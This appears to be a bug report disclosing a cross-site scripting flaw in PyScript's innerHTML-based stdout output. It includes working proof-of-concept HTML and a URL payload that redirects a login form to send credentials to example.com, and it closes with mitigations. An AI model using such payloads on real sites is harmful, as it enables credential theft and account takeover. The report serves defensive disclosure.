Printing is susceptible to cross-site scripting vulnerabilities by default

**Describe the bug**
PyScript writes stdout from Python to a div element using its innerHTML property. From [base.ts](https://github.com/pyscript/pyscript/blob/8c65cad209ed91f4bc8e0f5ebecf877bd29d3de2/pyscriptjs/src/components/base.ts#L45):

```typescript
    addToOutput(s: string) {
        this.outputElement.innerHTML += '<div>' + s + '</div>';
        this.outputElement.hidden = false;
    }
```

This method of writing stdout is prone to [cross-site scripting](https://owasp.org/www-community/attacks/xss/) (XSS) vulnerabilities. Rather than writing using innerHTML, the default should be to use a safe output method, such as appending a text node to the output element, or outputting to the console log.

**To Reproduce**
You can get PyScript to run arbitrary JavaScript when printing to stdout by using an XSS payload such as this:

```html
<img src="x" onerror="alert('XSS')" />
```

When the browser encounters this, it tries to load the image from the source `x`, but since there is no image there, it then runs the code in the `onerror` attribute. This pops up an alert dialog with the content "XSS".

This is shown with the following HTML:

```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>JavaScript execution from Python stdout</title>
    <link rel="stylesheet" href="https://pyscript.net/alpha/pyscript.css" />
    <script defer src="https://pyscript.net/alpha/pyscript.js"></script>
</head>
<body>
    Example of JavaScript execution from Python stdout:
    <py-script>
payload = "<"
payload += """img src="x" onerror="alert('XSS')"/>"""
print(payload)
    </py-script>
</body>
</html>
```

(Note: I split the payload into two strings before printing it. If it appeared in one piece, the browser would execute it when the page first loads, before the `<py-script></py-script>` tags are processed.)

To demonstrate why this is a security problem, consider the following example, where PyScript greets the user based on the `name` query parameter in the URL. The example also contains a sample login form where the user enters their username and password in order to post comments. The login form sends the username and password to `/login.php`, which would handle the login logic. (The login logic itself is omitted for the sake of simplicity.)

```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Dynamic PyScript greeting</title>
    <link rel="stylesheet" href="https://pyscript.net/alpha/pyscript.css" />
    <script defer src="https://pyscript.net/alpha/pyscript.js"></script>
    <style>
        h1 {
            font-size: 30px;
        }

        h2 {
            font-size: 20px;
        }

        form {
            border: 3px solid #f1f1f1;
            max-width: 500px;
            padding: 16px;
            margin: 12px;
        }

        input {
            width: 100%;
            padding: 12px 20px;
            margin: 8px 0;
            display: inline-block;
            border: 1px solid #ccc;
            box-sizing: border-box;
        }

        button {
            background-color: #04AA6D;
            color: white;
            padding: 14px 20px;
            margin: 8px 0;
            border: none;
            cursor: pointer;
            width: 100%;
        }
    </style>
</head>
<body>
    
    <h1>Dynamic PyScript greeting</h1>
    <py-script>
from js import location
from urllib.parse import urlparse, parse_qs

query = urlparse(str(location)).query
try:
    name = parse_qs(query)["name"][0]
except (KeyError, IndexError):
    name = "PyScript"
print(f"Hello, {name}!")
    </py-script>

    
    <form id="login-form" action="/login.php" method="post">
        <h2>Log in to post comments:</h2>
        <label for="username">Username</label>
        <input type="text" placeholder="Enter Username" name="username" required>

        <label for="password">Password</label>
        <input type="password" placeholder="Enter Password" name="password" required>
            
        <button type="submit">Login</button>
    </form>
</body>
</html>

```

With no `name` parameter, the script shows the message "Hello, PyScript!".

![HTML page displaying the message "Hello, PyScript!"](https://user-images.githubusercontent.com/5244112/168423414-5eff1126-cb0e-45de-a05b-6ec49cdddc00.png)

When we provide the query string `?name=Test`, the script shows the message "Hello, Test!"

![HTML page displaying the message "Hello, Test!"](https://user-images.githubusercontent.com/5244112/168423426-ac72012c-fffa-4f40-bccd-d0d195c809c3.png)

However, as the output of the Python `print` function is being written to the output div using the `innerHTML` property, it is possible to inject HTML and JavaScript using the `name` query parameter. There are many nefarious things an attacker could use this for, but as an example, here is a payload that changes the login form to send the user's username and password to https://example.com instead of to `/login.php`.

```
?name=XSS%3Cimg%20src=%22x%22%20onerror=%22document.getElementById('login-form').action%3D'https://example.com'%22/%3E
```

After URL decoding, this is the value of `name` that PyScript prints as part of the greeting:

```
XSS<img src="x" onerror="document.getElementById('login-form').action='https://example.com'"/>
```
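The decoding step can be reproduced outside the browser with the same `urllib.parse` calls the page uses. This is a minimal sketch: the host `victim.example` and the path `/greeting.html` are placeholders and not part of the original report; only the query string is taken from above.

```python
from urllib.parse import urlparse, parse_qs

# Hypothetical page URL; only the query string comes from the report.
url = (
    "https://victim.example/greeting.html"
    "?name=XSS%3Cimg%20src=%22x%22%20onerror=%22document.getElementById"
    "('login-form').action%3D'https://example.com'%22/%3E"
)

query = urlparse(url).query
# parse_qs splits each pair on the first "=" and percent-decodes the value,
# so the "=" characters inside the payload stay part of the value.
name = parse_qs(query)["name"][0]
greeting = f"Hello, {name}!"
print(greeting)
```

The printed greeting contains the raw `<img ...>` tag, which is exactly the string that ends up in `innerHTML`.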

Opening the page with this query string gives the following output:

![HTML page displaying the message "Hello, XSS" followed by a broken image link](https://user-images.githubusercontent.com/5244112/168423430-4dad514d-2ec5-4102-af5b-b5042386c1b0.png)

If you look at the developer tools, you can see that clicking on the Login button actually does send the user's username and password to https://example.com.

![Developer Tools network tab showing username and password being sent to example.com](https://user-images.githubusercontent.com/5244112/168423435-e3d03cc3-4f3f-4432-939b-5a93a77fd74c.png)

One way of exploiting this would be for an attacker to send the victim a link containing the malicious payload above, perhaps through an email. In a real attack, the payload would point to a domain the attacker controls rather than example.com. The victim then clicks the link and tries to log in to post a comment. When the victim clicks the Login button, their username and password are sent to the attacker's server. The attacker can inspect the server logs to find the victim's username and password, and then take over the victim's account.

**Mitigation**

When users implement PyScript scripts, they can mitigate this issue by HTML-encoding everything written to stdout. This can be done with [html.escape](https://docs.python.org/3/library/html.html#html.escape), like this:

```python
import html

print(html.escape("""<img src="x" onerror="alert('This will not be executed')" />"""))
```
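Applied to the greeting example, the same idea might look like the sketch below. The helper name `greet` is hypothetical and only used for illustration; the point is that the untrusted `name` is escaped before it reaches `print`.

```python
import html


def greet(name: str) -> str:
    """Build the greeting with the untrusted name HTML-escaped."""
    # html.escape replaces &, <, > and (by default) both quote characters
    # with character references, so the browser renders them as text.
    return f"Hello, {html.escape(name)}!"


payload = """XSS<img src="x" onerror="alert('XSS')"/>"""
safe = greet(payload)
print(safe)
```

With the escaped string, assigning to `innerHTML` shows the tag as literal text instead of creating an `<img>` element.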

However, this relies on a) users knowing that they should do this, b) users escaping all of their output correctly, and c) third-party libraries also escaping output written to stdout. This is unlikely to happen, especially when users are less familiar with security issues.

Instead, it would be much better for PyScript to have secure defaults when writing output. This could be done by wrapping the stdout value in a text node using [Document.createTextNode](https://developer.mozilla.org/en-US/docs/Web/API/Document/createTextNode) before appending it to the DOM, or by logging stdout to the console with [console.log](https://developer.mozilla.org/en-US/docs/Web/API/Console/log) instead of writing it to the DOM.
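The text-node approach can be sketched as follows. The real fix would belong in PyScript's TypeScript `addToOutput`; this Python version only mirrors the same DOM calls and assumes the DOM objects come from Pyodide's `js` module (the module the greeting example already imports `location` from). The function name `add_to_output` and its parameters are illustrative, not PyScript's API.

```python
def add_to_output(document, output_element, s: str) -> None:
    """Append s as one line of output without parsing it as HTML.

    `document` and `output_element` are DOM objects, for example obtained
    in a PyScript page via `from js import document` (an assumption here).
    """
    line = document.createElement("div")
    # A text node is rendered literally, so "<img ...>" stays plain text
    # and no element (or onerror handler) is created from it.
    line.appendChild(document.createTextNode(s))
    output_element.appendChild(line)
    output_element.hidden = False
```

Unlike `innerHTML +=`, this never asks the browser to parse `s` as markup, so no escaping is needed on the caller's side.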
